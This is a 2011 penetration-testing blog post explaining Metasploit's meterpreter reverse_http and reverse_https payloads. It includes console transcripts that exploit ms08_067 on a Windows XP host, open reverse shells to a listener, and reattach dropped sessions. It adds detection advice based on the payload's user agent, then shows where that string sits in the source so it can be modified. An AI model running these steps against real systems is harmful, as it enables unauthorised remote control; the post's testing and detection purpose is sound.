Meterpreter's new reverse_http and reverse_https options

Published 2011-07-07 at https://www.phillips321.co.uk/2011/07/07/meterpreters-new/

So we've all been unlucky enough to have a meterpreter session die on us, and then we've all been unlucky enough that we cannot re-exploit the box using the same vulnerability for some reason or another.

No one I know in the White Hat scene likes to use any form of persistence with a payload, and you'd be nuts to use the bind_tcp option for fear of leaving it running. (I've heard horror stories of teams turning up to perform a test and finding [netcat](http://netcat.sourceforge.net/) listeners running on the targets from the previous year's test!)

On 29th June 2011 [HD Moore released a new set of payloads](http://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication); specifically, it's the windows/meterpreter/reverse_http(s) payloads we're interested in.

The most interesting thing about these new payloads is that they are no longer tied to a single TCP session; thus, if your connection dies the victim will attempt to reconnect to the listener automatically! Sweet!
*This is probably even better news for those taking exams such as CHECK Team Leader and the like, where wasting time re-exploiting a box could be the difference between pass and fail.*

And that's it really, just use it the same way you would reverse_tcp.
*If you're using exploit/multi/handler make sure to set the payload correctly to re-establish the session.*

Going on from this, it's important to understand when the payload will terminate. We wouldn't want it to keep connecting back to the attacker for ever. There are some advanced options that we need to be aware of for the reverse_http and reverse_https payloads.

```text
msf exploit(ms08_067_netapi) > show advanced
Payload advanced options (windows/meterpreter/reverse_http):
   Name           : SessionCommunicationTimeout
   Current Setting: 300
   Description    : The number of seconds of no activity before this session should be killed

   Name           : SessionExpirationTimeout
   Current Setting: 604800
   Description    : The number of seconds before this session should be forcible shut down
```

**SessionExpirationTimeout** simply tells the payload to terminate after this amount of time, regardless of whether a connection is open or not. *Default = 1 week*
**SessionCommunicationTimeout** simply tells the payload to terminate itself after a period of not being able to connect back to the attacker. *Default = 5 minutes*

There is another option (**core_shutdown**) that tells the payload to terminate if the session is exited through the metasploit console.

The major benefit of using the **reverse_http** and **reverse_https** payloads is that they follow the standard HTTP protocol and can traverse proxies.

```text
msf exploit(ms08_067_netapi) > exploit

[*] Started HTTP reverse handler on http://192.168.1.109:80/
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Attempting to trigger the vulnerability...
[*] 192.168.1.151:1449 Request received for /INITM...
[*] 192.168.1.151:1449 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 3 opened (192.168.1.109:80 -> 192.168.1.151:1449) at 2011-07-07 13:03:20 +0100

meterpreter > pwd
C:\
meterpreter >
```

**SWEET!**

If you're unfortunate enough to have msfconsole die at your end, simply start exploit/multi/handler with the correct payload (http/https):

```text
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST 192.168.1.109
LHOST => 192.168.1.109
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > exploit

[*] Started HTTP reverse handler on http://192.168.1.109:80/
[*] Starting the payload handler...
[*] 192.168.1.151:1710 Request received for /CONN_e7LiknUYlilI6RW8/...
[*] Incoming orphaned session CONN_e7LiknUYlilI6RW8, reattaching...
[*] Meterpreter session 1 opened (192.168.1.109:80 -> 192.168.1.151:1710) at 2011-07-07 13:11:00 +0100

meterpreter > pwd
C:\
meterpreter >
```

The interesting thing to note here is that this type of attack is going to be relatively easy for sys admins to notice.
Shown here is a sample of how the payload talks back to the attacker:

```http
POST /CONN_e7LiknUYlilI6RW8/ HTTP/1.0
User-Agent: Meterpreter/Windows
Host: 192.168.1.109
Content-Length: 4
Pragma: no-cache

RECV

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Connection: close
Server: Rex
Content-Length: 0
```

Simply monitoring your site's inbound/outbound traffic for any user agent along the lines of **Meterpreter/Windows** should throw up some serious concerns if it's seen. Unfortunately this should also be pretty easy for a blackhat attacker to modify:

```bash
root@bt:/pentest/exploits/framework3# find . | xargs grep -i 'Meterpreter\/Windows' -s1
./external/source/meterpreter/source/server/server_setup.c-	// Allocate the top-level handle
./external/source/meterpreter/source/server/server_setup.c:	remote->hInternet = InternetOpen("Meterpreter/Windows", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
./external/source/meterpreter/source/server/server_setup.c-	if (!remote->hInternet) {
--
root@bt:/pentest/exploits/framework3#
```